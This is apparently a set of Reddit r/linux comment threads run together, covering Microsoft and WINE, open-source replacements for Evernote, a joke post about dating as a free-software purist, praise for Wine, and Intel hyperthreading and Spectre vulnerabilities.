You are, of course, absolutely correct. If MS loved Linux, they would also implement official support for Linux file systems, like ext4. I'll give them a break on btrfs, because its not officially stable yet or widely adopted, but there's no excuse for not supporting ext4 other than trying to suppress competition as usual.

Its crazy how my Android phone can't read an ext4 formatted memory card when the actual internal file system uses ext4! I wonder if some money changed hands behind the scenes to prevent us from just using ext4 formatted memory cards.

And if you think I'm crazy, look at how they tried to lock out Ogg Vorbis from PMPs with PlaysForSure.

https://en.wikipedia.org/wiki/Microsoft_PlaysForSure

Its also worth noting that Cyanogenmod builds will read an ext4 formatted memory card, but not official ROMs from manufacturers. So what's the deal?
I wonder if "SQLServer on Linux" will leverage WINE in any way.
Honestly, MS never loved Linux.. They just wanted Linux inside them.
This thread is such a braindead circlejerk that it's starting to get embarrassing. 
It Microsoft really "loves Linux" they would burn their garbage OS to the ground and go buy Ubuntu or something. They don't give a half a flying fuck about GNU/Linux other than trying to push their horrible, cancerous software onto it.
Microsoft doesn't want desktop users to use Linux. The only software the average consumer is likely to buy is whatever comes preloaded on their computer. They have to make sure there's still demand for PCs to come with Windows pre-installed. 

Now, in the enterprise world, they have to embrace Linux because it's got an established market share, and they're not going to fix their brain-dead licensing model (does anyone think CALs are a good idea?) or re-engineer Windows to be suitable for high-availability applications. They're porting a bunch of stuff to Linux to prepare for selling SQL Server for Linux. They'll probably do well selling their ridiculously overpriced database for Linux, given the other common commercial database that runs on Linux is even more ridiculously overpriced. 

Don't get me wrong; Microsoft has made some good products. The .NET platform is alright, and the C# programming language is actually pretty cool. OneNote is the best note-taking software out there. Visio is the best general-purpose diagramming software, not as good as programs specific to one task, but still good overall. Windows's tablet input is impressive, especially the handwriting recognition. PowerShell is a very cool concept, even though I'm not a fan of some of the implementation details.

On the other hand, some teams within Microsoft seem to be completely out of touch with reality. The Windows UI has been on a mostly downhill trend since XP. So has Office. Windows takes up an inexcusable amount of hard drive space. Visual Studio is very likely the most bloated piece of software possible. Skype gets installed automatically as an update, and if you don't have an account, you have to edit the registry to make it stop showing up every time you log in. Plugging in a USB drive while an install is running won't work because it will fail to install the driver, even if you've used that exact drive before. 

Microsoft is just another company. They have their good and their bad, but mostly they're just a bunch of morons trying to accumulate money. 
If MS *really* loved GNU/Linux they'd cease with the patent shake-downs and other shenanigans over pre-installed GNU/Linux.

MS remain toxic to F/OSS. I know they have opened a few things, but I view those as little more than Trojan Horses.
Because too much love leads to their obsolescence.
I do not use Microsoft products so I do not use Wine. If Microsoft really loved Linux they would include Linux in their installation package, even charging a price if they want. 
If they really loved linux they would stop using the Washington Post to run hit pieces against linux.
Omg! I just love linux! *air kisses*

Omg, we super respect your privacy! 
mind: blown
Why would Microsoft give away their main edge (gaming) against Linux?  Just because I like a competetior doesn't mean I'm going to help them be more attractive than me...
It wouldn't be difficult either. If they can write a Windows Subsystem for Linux they can write a Linux Subsystem for Windows, and even better than WINE currently is- It could be a bunch of system libraries in /usr/lib/lsw, and the C: drive structure can be mapped to various LFHS directories. If they really wanted to, they could enable Windows applications to work seamlessly on all systems.
Corporate greed doesn't allow them to love Linux....
What is love? 
Why on earth would you contribute to WINE from a Microsoft view point?  
That's like McDonalds contributing to Burger King.  
I find it hilarious how Microsoft gets criticized here all the time for things they have to and should do.  
You get mad at other corporations that have to make a profit and pay their employees too? "Hey Adidas, you suck, why don't you give out all your stuff for free?"

Err, why should they? WINE is a pretty bad compatibility layer. It is not a sustainable solution for achieving compatibility with Windows applications and likely never will be.

Instead, why doesn't Microsoft port Office to Linux? That would be actually interesting.
They never contribute to WINE, but they contribute to kernel code.
They don't give a shit about the Linux desktop, they care about Linux on servers, on Azure. That's where they make money on Linux.

I don't get the fetish for this around here...
TBH, contributing to WINE wouldn't be such a stupid idea.

Step 1: Contribute to WINE, making all windows programs work perfectly on Linux/OSX

Step 2: Wait for people to get used to Windows programs

Step 3: Slowly drop support for WINE, causing some people to go back to Windows because they want to keep their applications.
I highly doubt this will ever happen. Microsoft only cares about Linux as far as it runs on their machines, not as an OS or the tools that run on that OS.

But I also think keeping microsoft money out of Linux is a great idea.
Printing & Tab Selection in my accounting software. It's the last thing I need windows for. I'd love to be able to run it properly in WINE.
It's a lot of work to do it right.
Microsoft loves Microsoft. 
I always thought that Microsoft was not against Linux but actively against the GPL, which governs the Linux kernel, since it directly impacts their business model... Or at least the business model they had in the 90's. IIRC when Ballmer infamously said "Linux is a cancer" he meant the GPL mechanics.
MS could sell their own distro. 
They did in a way when they open sourced .Net
But they really do love Linux - they are actively encouraging users to move to it from Windows ;)
but that's embrace and extend in reverse.
Because the libraries and API's are closed source??? Are you people completely out of your head. Why would they out source their own closed source libraries to an open source application layer written from scratch?
Right!
E.E.E.
I love linux but I don't contribute to WINE because I hate WINE.
I thought the developers helped from time to time, even if it wasn't sanctioned by Microsoft explicitly.  Or was that just for the Xamarin project?
That would no be good business for them.
M$ = deceptive contracts and spy users
[What about contributing to the Linux kernel?](https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/log/?id=refs%2Ftags%2Fv4.8-rc4&qt=author&q=%40microsoft.com)
Relevant wiki article: https://en.wikipedia.org/wiki/Embrace%2C_extend_and_extinguish
how does cross platform stuff like xamarin, other cross platform net things, the open powershell play into ms supposedly loving linux?
Well. They do stuff that lets them integrate with Cloud stacks running Linux. They also do stuff that lets them run originally Linux and BSD daemons on Windows, again mostly in the cloud.

Wine is for userspace applications is of no strategic value to $MSFT.
It's complicated!
But wouldn't that mean some people will not use windows Any more and choose Linux .
Why would Microsoft help to add a new competitor in the market ?
Or contribute to NTFS-3G.

No, if they loved Linux they'd switch to a UNIX operating system and provide backwards compatibility via virtual machines.
as a linux openbox user for more than 2 years now, i just hate windows and anything that says microsoft. 

i am using corei7 with 12 gigs of ram acer laptop with 2gb dedicated vram. i just hate microsoft and all the proprietary software.

linux = more power, more control = treat microsoft like a bit*** = hack the shi** out of windows users

 just my comments, upvote if your with me!

WINE is a dead end. It's been around for like 20 years and is still pretty mich in an alpha state. Throwing tons of Money at it won't help Linux.
And then people do don't buy Windows? Yeah, didn't think that was gonna happen. They might love Linux but I don't think they love it *that* much.
So there might be guys using Evernote in Linux either via Wine, a third party native client, or their web interface, like me. 
This recent changes are a deal breaker for me, and I decided to dump it completely and to start using [Turtl](https://turtl.it/) full time.  Some features:

* It is encrypted
* Free (a premium version is coming, though)
* It can handle bookmarks
* Can be self hosted 
* Open source (both server and clients) 
* Clients for Windows, Mac, Linux and Android versions (IOS coming soon)

It is a new service so there are some things to tweak and to improve, but in all, I'm quite happy with it. 

Just deactivated my Evernote account after moving everything to Keep.  It's not like I was keeping nuclear codes in there or anything.
I replaced Evernote (which is laggy anyway) by SimpleNote. 
I was already moving away from Evernote, and this has sealed the deal. I tried a few alternatives that were OK in their own way, but eventually settled on just using markdown docs in a Dropbox folder. With a nice editor like iA Writer my note taking workflow is pretty simple, fast and flexible.
Does this have a web clipper? 
Oh yes you had me at self hosted 
Nice! Was looking for an alternative when I got that email. Is there a way of transferring everything from evernote to turtl? Or some other alternative? 
[removed]
I often use Evernote to digitize my hand-written notes (which involve a bit of math and drawings) using my Android phone.

I haven't really found an alternative for taking photos of a page and then automatically processing it for angle, and applying contrast and sharpening etc. in the way that Evernote does. The results are really great. At least in comparison to most other services which do not even offer this.

I feel kind of trapped by this move as a result.
It would be great if they put this up on F-Droid. I would love to try it out. I need a good note taking app.
I'm still unable to register on Turtl. I reported the issue to a dev and told me he'd look into it like a month or so ago but still have heard nothing.
I came across this project a couple days ago, however I haven't tried it yet:
[http://paperwork.rocks/](http://paperwork.rocks/)    



I just wish there were a client that uses the native toolkit(s). The current one doesn't, and it shows. I'd even settle for GTK for Linux.
PSA: http://alternativeto.net/software/evernote/
I'm currently using ownnote  on owncloud which is pretty good. Mobile client is fast and simple and the web client just works. much more functionality than the built-in notes application.

That being said, I'd love something closer to an evernote that I can host/backup. 
You know what would be sweet? If every device on the Internet had a permanent, globally routable address.

That way, you could have peer-to-peer sync with minimal configuration: just connect them with a cable once, tell them to get acquainted, they exchange addresses and keys. After that, they are forever in sync, unless you tell them to stop syncing.

Obvious problem: you lose anonymity. Maybe everyone also gets a random, temporary address?
Looks like good stuff.
Newb here, but Turtl looks like a very cool DIY project. Two questions: 1) If you host it yourself, are all of the "features" included (you aren't missing out on anything the paid service provides) and 2) would a Rapberry Pi be a good platform this kind of thing? 
Can I clip webpages to it?
Wooooo. Evernote not only lost me with the pricing (i have 3 devices) but their desktop client update fucked over my sync, it would only sync inwards not outwards. So I had an entire week where my notes I'd rely on were subtly messed up on my phone. Then I couldnt find a download link for the older version. I was so pissed when Irealized what was going on that Imoved everything to onenote.
Needs checklists
You should cross post to /r/selfhosted.
Does anybody know any tool I can use to export all my evernote notes? 

Given that I'm, obviously, a linux user, and been using web version of evernote. 

Now it seems high time to migrate, but it would be nice to take all my stuff with me. Of course it's possible to write a script to get all your notes using evernotes' API, but I was hoping there are already some tools to do that.
[deleted]
Another option is the Zim wiki, which you'll find in most distros' repos
Turtl crashes all the damn time on Android. Frustrating, but otherwise good.
Awesome! Thanks for sharing this, I use evernote quite a bit and was hoping for something open source (and self-hostable!) to replace it. Thanks!
The primary reason I use Evernote is for the web clipper functionality. Can Turtl do that?
Thanks I might give this a go. I was using springpad until they went belly up. I am using Evernote and it seems like a pain to to do anything, like add a notebook into another note book...man I miss springpad
Good find! Not that the changes Evernote made really affected me but, I was looking for a good open source alternative. Just to clear up one thing though. If you are like me and using Evernote via Web. You will not be affected by the 2 device limit.
How about MS Onenote?
I use essential pim

And ultra recall

I wish ultra recall had a sync feature. I don't like storing my shit online.



Can anybody comment on CherryTree alternatives?
When you installed do you have to lunch it as super user? because i can't lunch it as normal user.
Is there an alternative which is accessible via both desktop and as Android app, with UNDO functionality? Only Evernote has that AFAIK.
I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit:

- [/r/linuxactionshow] [FOSS Evernote replacement (Crosspost)](https://np.reddit.com/r/LinuxActionShow/comments/4qmqdh/foss_evernote_replacement_crosspost/)

- [/r/lisp] [Turtl makes r\/linux front page.](https://np.reddit.com/r/lisp/comments/4qrg33/turtl_makes_rlinux_front_page/)

- [/r/techtalktoday] [Evernote free now is limited to just two devices, and its prices increased 40%. Turtl is an open source alternative with a Linux (and other OS) client. : linux](https://np.reddit.com/r/techtalktoday/comments/4qopxz/evernote_free_now_is_limited_to_just_two_devices/)

[](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*

[](#bot)
I've been using SimpleNote but Turtl will be my go to app for notes and stuff. SimpleNote will always be my boo though
how soon is the ios thing coming
Turtl can't save webpages.

You could as well say that emacs is an "alternative" to Evernote, because you can write notes in emacs.
Amazing!
I use Todoist instead of Evernote. $28.99/yr for Premium. I use the mobile app on iPhone and the Chrome extension. Works great!
HA.  Glad I dumped evernote when I picked up emacs again.  Suck my fat org-mode, Evernote. 
Currently I'm using bunch of markdown files synced using Synching but this looks tempting. And server is written in common lisp :O
It looks to me that the strength of Turtl is in being a "shoebox," to collect and later quickly retrieve pieces of information. From what I've been reading about Evernote, this seems to be the main functionality that many users need, so I'm very happy there's open source options.

Unfortunately, what I use Evernote for is harder to find. I spent a good amount of the past two years using evernote (on a company Ipad) doing on-the-spot note-taking, which included recording audio while typing and occasionally doing quick drawings with the touchscreen. I'd also take pictures of relevant documents or presentations and attach them to the notes. Now that I'm starting grad school (and no longer have the Ipad) I've been looking for some way to do the same on a (touchscreen) linux laptop for classes. Evernote and OneNote are really the only solutions, and neither one has a native, offline solution. I've haven't been able to get either completely working in wine either.

I think the best option might be to code some quick scripts that can start a sound recorder, or launch some sort of simple drawing app, and insert the resulting file as a link in markdown. Still very much theoretical, but in this case rolling my own option might be the only one. 
No love for Springseed?
I use simplenote

Totally free

Phone, PC and browser. How many devices do you need it on?
Just tried it for a few minutes.  Might use it for sensitive material as text encryption in Evernote is kludgy but actually more secure if someone has access to my phone.

Lack of location at which note was taken is a huge deficiency for me as I am a traveler.

No reminder system, but I could go without and just use wunderlist.

No tagging but being able to put a note on multiple boards is awesome.

Any idea how to migrate an Evernote notebook?
Downloaded, launched, closed. No offline mode is a dealbreaker for me. Consider a feature.
I tried to use turtl because I want to support lisp projects, but the thing of having to"sign in" to do anything destroys the workflow you normally have with note taking where you want very little input and fast.

I don't know too what extent it would affect security but it would be nice to have a quick-note function so I could use it and be if not as productive then almost as productive as I am with Google Keep.
Off the topic a bit, but since there are many on mac. 
In the mac Evernote app, select all, export.
Open Notes app, import. On Linux use iCloud web.
Kinda solves it.
what about nimbus note?
Just achieved the following in effect(no, not using osx):

https://evernote.com/media/img/kb/en/drag_trash.png
What the hell is up with almost every new and cool application being written in Javascript? O.o
"All the options are fairly well documented."

Help a brother out - where is it documented? I'm stuck in a loop trying to find the documentation and end up in the same place where it says the above. Here is the link to that:
https://turtl.it/docs/server/
I use CherryTree (offline desktop app), but will check out Turtl in a couple of years. I looked at the github, it's only a single dev driving it. Not willing to move to something that could be abandoned in 6 weeks.
Or just use Keep or OneNote. 
I don't see why a true Linux user would use Evernote in the first place, after they have consistently demonstrated they don't give a rat's ass about Linux customers,  both paying and otherwise. It's like trying to sneak through a chimney into a house from which you've been repeatedly ushered.
Use simplenote.com
[deleted]
What's 40% more than free...?
Two issues I have:  
* There is no way to reset a password
* There is no web client

Both can be argued from a security point of view, but it's getting dangerously close to security preventing it from being generally useful.

[deleted]
As a twenty year old single male I think it's very hard to find a girl who's actually interested in free software. I've had girls jokingly ask to "Netflix and chill" but when I tell her that I don't use Netflix since Netflix requires proprietary software to stream content, they stop talking to me. And worse if they do stay they think I'm weird since I blocked google IP's in my host file and we can't even watch youtube. I can't ever seem to get girls to come over to my place and I can't text them either. Once I get their numbers since I've added customs roms to my phone and refuse to use sms since it's a security concern I require all of my friends to download a free and open source messaging app and I share with them my public gpg key so that we can verify that our conversations are secure. None of my friends are willing to do this. And I can't use sites like tinder since it's not only proprietary software but a major privacy vulnerability. How come it is so hard to find a girl concerned about software freedom. I feel like I'm going to be a virgin forever.

EDIT: Btw the this post is GPLv3. So feel free to use it however you want but please send you changes back to me.
/r/fossworldproblems
You should try meeting girls at PGP key signing parties. 
Kodi and chill
Fucking hilarious.
Actually it's "GNU/virgin"
This is such a great post
this is the best thread ever holy shit
You are, of course, joking I hope? 
Keep on searching and don’t change. One you found a nerd/geek girl it’ll be the best thing in life! (Pro tip: Of course you’ll die as virgin.)
what's the point of dating anyway? i'd much rather stay home by myself and enjoy my privacy than going out and revealing my personal information to others, especially females who have no regards for privacy and always nagging to know every bit of your life. 
It funny cause it is true.

Few days ago I was posting whether someone knows an open source dating app. There are none. How are we linux users suppose to find women. Other than in hacking conferences in which case you dont know if they are interested or just social engineering you. 
[deleted]
/r/UnexpectedStallman
You can watch youtube by downloading the videos with youtube-dl. This works over Tor as well.
I know how you feel, OP.

All the free software in the world won't help us if our friends won't use it. The goddamned network effect.
Man this would be a great copypasta.
Yes, getting laid is the reason I use proprietary software.
Please note that the GPL requires the full text of the license to be included with the original work. Not including it makes it seem like you don't really care about free software.
This is how copypasta is born.
Richard is that you?
It's hard out there for a GIMP (user)
You've made such extreme decisions to boycott commonly used things that you have made yourself pretty eccentric. You have greatly narrowed the field of possible mates by making such unusual and strict choices. Are you really surprised by your dating difficulties? It seems completely predictable to me.
are you Stallman?
I went through your profile. And while people find your posts hilarious. i found them different, positively to be upfront.

Now about the free software dating scene: dude, forget about it. I have trouble finding geeky girls, and you're talking about girls who're supposed to boycott netflix, google... THEY DON'T EXIST.

This is how it is. You get to choose between getting laid and boycotting proprietary software (who 99.99% will never give a shit about you except for analytics). Or you could just use proxies and a false identity.
We have all witnessed the birth of a copypasta
Try  your local hackerspace.
You went viral on Twitter, mate!
I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit:

- [/r/bestof] [\/u\/alternative\_sharpton can't find a date](https://np.reddit.com/r/bestof/comments/4am8fg/ualternative_sharpton_cant_find_a_date/)

- [/r/fossworldproblems] [Lets talk about the free software dating scene. \[X-POST from r\/linux\]](https://np.reddit.com/r/fossworldproblems/comments/4adu2q/lets_talk_about_the_free_software_dating_scene/)

- [/r/programmerhumor] [\[x-post \/r\/linux\] "Lets talk about the free software dating scene"](https://np.reddit.com/r/ProgrammerHumor/comments/4afoov/xpost_rlinux_lets_talk_about_the_free_software/)

- [/r/uwaterloo] [Can you guys help my friend with his dating problem? (x-post from r\/linux)](https://np.reddit.com/r/uwaterloo/comments/4akyue/can_you_guys_help_my_friend_with_his_dating/)

[](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*

[](#bot)
On a serious topic, aren't basically all the dating apps revealing exact location data these days? I'm not sure about Tinder, but I have read about how Grindr uses no encryption and does its location "fuzzing" on the client side, making it trivially easy to triangulate any user's position. Scruff is also similarly compromised. Neither seem to have any intention of improving privacy. As for Tinder, while I have no evidence one way or the other, I wouldn't be surprised if it was just as bad.
Obvious troll is obvious. 
I'll just drop this here: http://rms.sexy
Video is overrated. I have all my cds ripped to FLAC and I have a cmus jukebox to run through them all. 

I invite girls over to listen to music and chill.
[deleted]
Hey OP what's your messaging app of choice
Awesome troll is awesome ...
Heya Ken M., big fan here!
I just want you to know, I love this type of troll-job. Thumbs up, bro. 
I'm saving this for comedy gold. 
Haha this is ChatGPT
But the text looks like a parody on Stallman's statements and principles.
You could try using some sip system and text them using that.
A friend of mine insists on using Threema as a messenger app. He offers to pay for all of his friend's licenses so they comply with his wish. Kinda funny.
Absolute perfection of a thread 
Want to uppenguin but thread at 420 penguins.
[deleted]
Like users in /r/Linux need to worry about dating.
can somebody X-post to /r/funny.
Try man girl in the terminal.
quite funny thread.
So this is how cyborgs are born... note to self: never be so nerdy.

As a matter of fact, I should probably close down some apps, go outside, enjoy the breeze, and possibly do some social-y things. 
Freedom for all also means everyone being free to make choices you don't necessarily agree with. Never take someone's autonomy away with stringent requirements. They will rebel or ignore your message entirely. 

Think of it like sex ed: abstinence only education is doomed to fail horribly, but teaching safety and healthy relationship models will slowly help improve the world. Also like sex ed, sandbox the apps that you know are risky, but their use improves the quality of your life. They are fun to use and allow you to communicate with the rest of the world... So keep'em wrapped up, even if it makes them a slightly less pleasurable experience.
Of course your school of fish will be a tiny subset of what is in the ocean… because that is what you want. If you resort to misleadingly or dishonestly diluting your actual needs, as most idiots do, if you stop being honest and forthright about your character, as most idiots do, then you will never find the person you want. You might find someone, to be sure, but she won’t be what you set out to find in the first place.  If all you need is to get laid for a while until the buzz wears off and then move on, then by all means do what the idiots do; it works well for them.

You are unique, a distinct minority.  Own your quirks, accept them, and then be forthright and patient enough to find another person who complements them.  In your case, it may take quite a few years.  (In my case it took four decades.)  As to what medium or method you use to locate your perfect mate, I doubt I can offer any suggestions you will like... I used OKCupid and eventually it worked after 5+ years.
no worries with /r/popcorntime & chill though
If you're so paranoid about privacy, I don't think sharing your private life is for you. You mentioned elsewhere you feel you have to choose between girls and your approach to free software. WELL DUH. You make the most basic social interactions almost impossible, and have basically cut yourself off the bits of the Internet which are enjoyable. So yeah, get used to singledom or change. Evolve or die. 
This is trolling, right?
by calling Poe's Law: I can't tell if you're serious or joking. Quite frankly, I think you're full of shit, and a fucking troll. I chose the expletives for the power behind them. Get the fuck out.

However, I will assume the premise that you're serious. First, your attitude is reticent in the wrong direction. If you want to lie, lie about the amount of money you earn and your interests. Use the psychotic encryption mentality you have in a story alluding to being in some job that requires your communications be encrypted or something. Considering you have a smartphone at all breaks your narrative about being devoted to Free Software, because most - if not all - cellphones are (allegedly?) running an operating system operating on the radio chips outside of the purview of the guest operating system, with control over it. Never mind all of the binary blobs tainting the kernel. If you want to look legitimate, then ditch the cellphone. 

Secondly, being a virgin isn't bad. You're sitting here bitching about the fact that you will have to lose the freedom you have to get your dick wet. Everything is a trade-off, and there is no such thing as a free lunch. If you want pussy, it comes with degrees of compromise. Romantic relationships, even more so. Pick one: your freedom, or degrees of loss of freedom. If you choose your freedom over less of it, then you'll be a better man than most others. Stay on the course, I'm sure you will eventually find someone willing to deal with your psychosis. Until then, deal with going to bed with Pamela Handerson, use the spare energy to work on self-improvement instead. Go make that stupid dating site instead. "Go your own way", if you will.

You have issues that can only be dealt with by qualified healthcare professionals. Get help.
>Uses reddit

>complains about Netflix, google together with its youtube-service and sms

I sense a conflict brewing here.
[deleted]
Amazing, please enjoy a FOSS beer on me /u/changetip
"Netflix and chill" was 7+ years ago!?!?
It's matching with current situation of mine.
Have you considered taking Estrogen? Helped my dating life a ton.
This is so fucking true. This post could be made by Stallman himself
[/r/iamverysmart](https://www.reddit.com/r/iamverysmart/)

I'm not affiliated with Wine in any way, but still feel obliged to post this: [donate 2 wine](https://www.winehq.org/donate)
I think it's great.

But it certainly isn't from the gods. It represents 20 years of hard work.
Oh man, my electronics hobby would be so terrible without wine! I'd have to run LTspice under Windows. Ewww.

It helps that the LTspice devs test against wine. If only more windows developers would do this.
The code is a good read and a great resource for Window devs when MSDN lets you down. Back in my Window dev days, it filled a number of MSDN holes. Plus its just a good read.
Yes, Wine is an amazing software feat, no doubt about that. But it's also a clutch (that most of us shouldn't need anymore, IMHO) and a double-edged sword.

Every time a developer argues that there's no need for a native Linux version of their software because the Windows version "works" with Wine, or bundles Wine with their software and dares to call that "a port", I wonder if Wine is actually hurting the Linux ecosystem much more than helping it. It's the OS/2 effect all over again ...

[deleted]
Ironically running win32 software with wine probably provides the most backwards compatibility that linux developers can only dream of, especially with non-console applications.
God always gets the credit for the work of doctors and wine devs. 
I haven't used wine for literally years, but just the other day tried to launch World of Warcraft to play on a private legacy server and it ran perfectly with absolutely no configuration changes. I was expecting to have to install DLLs, make config changes, etc. Really surprising.
actually it is a gift straight from the devs. god doesnt know how to write code.

give credit where credit is due.
I haven't used Linux as much as I should but I've never got wine to work :( though that's user error. 
I read this as "Devs, Wine is a gift straight from the gods."
I can play Guilty Gear Revelator 2 flawlessly on my machine (even online) thanks to Wine. I wanted to donate after I confirmed that Rev 2 works as well (before I played the first version). I will donate later today!
Other than games, what applications are people running on wine?
What is it if they are not reading this?
The wine program is a gift straight from the hard work and endless toil of the developers building and maintaining wine. Thank them =)
I love wine, but Adobe CC doesn't run under it. Neither does PowerDirector, so I still have dual boot. Fuck media player dependencies. 
... but can you make Office 2016 run?
Wait, seriously?

I always try Wine before falling back to a full on Windows VM instance ... I can't think of a single case where it actually worked. The Windows app always ended up either freezing or crashing under Wine.
It's OK I guess. It's application support is mostly older applications( like Office 2010) and it's game support is a real hit or miss(Doom 2016 ran slightly slower than it's Windows version but very much playable on my 960 when I last tried it). 

Not nearly as great as the CrossOver developers say it is by a long shot.
Or you can just use Windows and save your sanity.
[https://www.theregister.co.uk/2019/10/29/intel\_disable\_hyper\_threading\_linux\_kernel\_maintainer/](https://www.theregister.co.uk/2019/10/29/intel_disable_hyper_threading_linux_kernel_maintainer/)

All Linux laptop vendors I know of like Dell, System 76, Purism don't seem to provide AMD based Linux laptops.

I'm not so sure about workstations though as my knowledge in that area is quite limited.

I don't understand how people are okay with using Intel chips for so long with so many  vulnerabilities, especially when software based patches significantly  destroy performance.

&#x200B;

&#x200B;

Edit: Whoever  put the proper tag and the name: Thank you. I  should've mentioned his name in the title.
[deleted]
[Dell actually do sell AMD laptops](https://www.dell.com/en-us/shop/amd-processors-graphics-cards/cp/amd-processors-graphics-cards), they just tend to not update them very often.
>	I don’t understand how people are okay with using Intel chips for so long with so many vulnerabilities, especially when software based patches significantly destroy performance.

I'm pretty sure a lot of us have already invested into our Intel cpu before all the spectre like issues came to light
If I remember correctly, it was known long before the Spectre and Meltdown, that Hyper-Threading is insecure. And disabling it was always the recommendation, if you need better isolation of processes running on the same CPU. People don't typically disable it maybe because:

1. They don't need isolation. In a typical single-user Linux setup, every program already has full access to all user's data. There is not much you can steal via Spectre. A notable exception is browsers, which run totally untrusted code in a sandbox, but browsers themselves mitigate CPU vulnerabilities.
2. They need that extra multi-threaded performance.
3. They don't care.
I’m not dropping thousands of dollars in junking my old equipment when the mitigations work ok.  That would a waste of resources and mitigation’s would still need to be developed once that equipment made it hands into people who use older systems due to lack of choice.


Will it influence my next purchase? Yes.  But this is not a “replace everything at once” problem.
OpenBSD is right again
Not all Intel processors have SMT-related security flaws, because not all Intel processors have hyperthreading.  For example, the 9th-generation Core i7-9700 has 8 physical cores and 8 threads. In spite of the lack of hyperthreading the processor is very performant. Buying such a processor provides an easy way to avoid the security issues associated with SMT. 

When this processor was released a lot of the tech press seemed a bit surprised, and were asking questions like "why did Intel leave out hyperthreading in a higher-end processor?" Perhaps the people who ask this haven't been following the discussions regarding hyperthreading and security.
[deleted]
Decent RISC-V  PCs when?
I have OpenBSD flashbacks
[deleted]
CPU's are getting complicated. Its been a very long time since we've had predictable states in chips, and the fact that Spectre / Meltdown affected so many prior generation of Intel CPUs is a testament to that.  AMD is lucky so far, but the whole RDRAND bug has me a bit worried about their quality control.  That is such a simple thing to test for in QA processes.  

I'd argue that the RDRAND bug is even more concerning, because it is not always clear what the system uses for RNG, and so many security components in an OS depend on good RNG (think TLS, ASLR, full disk encryption, SSH keys, etc).  If an adversary knows that a seed for a key is 0xFF...FF right out the gate, the solution space is much smaller.

I think speculative execution "bugs" are here to stay.  It's a security / speed trade off.  I do not know how you can use speculative execution without leaking some information about what the system is doing at that time.  People complained when we started using protected memory in chips back in the late 80's and early 90's, saying we were killing performance for security.  This will probably end up being another one of those debacles.
https://www.anandtech.com/show/15036/sifive-announces-first-riscv-ooo-cpu-core-the-u8series-processor-ip

Hope these come to laptops soon.
If your goal of buying a machine with Linux pre-installed is to avoid the sale of a Windows license, then you can often contact sales of the OEM or an authorized reseller to purchase without Windows--would probably just end up being FreeDOS. What is available in the web order form is not always going to be the only possible configuration.

Lenovo has a bunch of machines, some with AMD processors, that they certify for use with Linux: www.lenovo.com/linux The Thinkpad T495s is available with a 3500U/3700U.

If your goals is to save money, then its pretty much a flawed goal. The actual cost of the Windows license in the total price can be negligible. For a large OEM the added cost of the Windows license after the heavy discount from Microsoft and all of the bloatware it will be well under $50--in many cases it can cost more without Windows when the OEM doesn't make the money off the bloatware.
Purism should start doing power9 laptops.
AMD also has some Spectre related issues. But if you want an AMD laptop, probably the easiest way is to [search from their website](https://www.amd.com/en/shop/us/Laptops). A lot of the vendors are clearly pushing Intel models, but AMD has their own vendor agnostic search that links to models on the vendors' websites.
Crap! I'm glad I saw this this-morning. I had forgotten the about the spectre issue plaguing Intel. I'm in the process of picking out a Mobo and Ram. Had my thoughts going with Intel. Nope. I'll build an AMD machine this time around.

Build is for editing video.
Are these problems actually relevant for a personal laptop? I mean, as I understand it this an issue with VPS or multiuser systems. Is it also a big enough threat to be concerned about for the layman who purchase a laptop for his personal use?
it's interesting to say that being designer and manufacturer of extremely-wide-used CPU a corporation in fact has very big power over many people of the globe. And regardless of this fact, there seems were absolutely no public audit of their product. I think that this is not acceptable from the point of view of relationships between monopolist of socially critical product and people. Such products MUST be audited on behalf of the society. Without that, there will be no world economy, will be only imperialism. Am I too democratic?))
> I don’t understand how people are okay with using Intel chips for so long with so many vulnerabilities, especially when software based patches significantly destroy performance.

Because Intel chips are faster when you disable the mitigations. Not everyone is a cloud provider that needs to run everything in a fully secure manner: if you just use your PC to play games or render videos, you don't run untrusted code (barring browsers, but they have their own mitigations) and you basically do not care if game 1 can spy on game 2, or everything else on that machine for that matter.
> I don't understand how people are okay with using Intel chips for so long with so many vulnerabilities, especially when software based patches significantly destroy performance.

It is quite simple really, both Meltdown and Spectre do exploit a vulnerability in speculative execution, but they are impractical. 

I reimplemented Meltdown from one of the original papers for an upper-division undergrad CompSci project. To even test the vulnerability, I had to disable several kernel features that have been in place for years before the exploit was even published, and even then I could only recover the target test data if I already knew it's exact physical address. Additionally, the exploit had to be running on a different core than whichever process was keeping the target data in memory.

Randomly scanning memory using the exploit never returned anything that resembled structured data and is was extremely slow. Despite optimizing the program to the bare minimum and reducing timing thresholds, it would have taken around a month to scan 4GB of memory once, and that is with a high possibility of error.

It has been over a year since I did this project, so the details maybe a bit fuzzy.

Anyway, you have to weigh the risk versus the performance loss of not using these features of Intel CPUs.

In my opinion, it is like this. . .right now my bedroom is vulnerable to intrusion because my bedroom door is not closed. It is not closed because it is more convenient to keep it open in terms of moving in and about the house. However, the front door is locked and the security alarm is turned on. . .chances of someone making it to my bedroom door are low . . .but is making those chances lower with the additional inconvenience?
Honestly I have 0 hope for any of the chipmakers now. All of them suck bad. Intel has their shitty bugs, AMD has the un-neuterable PSP and delayed graphics support, and ARM has the shittiest boot code in existence. Can't wait for RISC-V.
Dumb question, but why are people worried about Spectre and Spectre-like vulns on laptops?
All of my personal hardware is currently Intel but I can't see a single reason to continue that trend. My next box will most likely be Ryzen.
[deleted]
I hear different answers to this question: how realistic for a spectre attack against a personal computer?
I would love it if Purism sold a laptop with an AMD chip. My next laptop will probably be a Pine64 which uses ARM anyway.
[deleted]
Good thing my i7-9700K has 8 actual cores and no HT.
AMD laptops are very limited especially when looking for certain specs, i do not know why. Asus is providing a Ryzen laptop with Nvidia GPU for a good price despite its short comings, its better than nothing. However what about high end stuff in a  "slim package" like the more expensive ROG Zephyrus?  


If I am being ignorant or naive please do let me know.  
But AMD really needs to offer more in the laptop market, be it partnering with a brand, or if possible making their own laptops.
I guess, I'll have to get a laptop with AMD chipset now.

I am relieved that I saw this before buying a laptop.

Peace.
Ryzen here I come
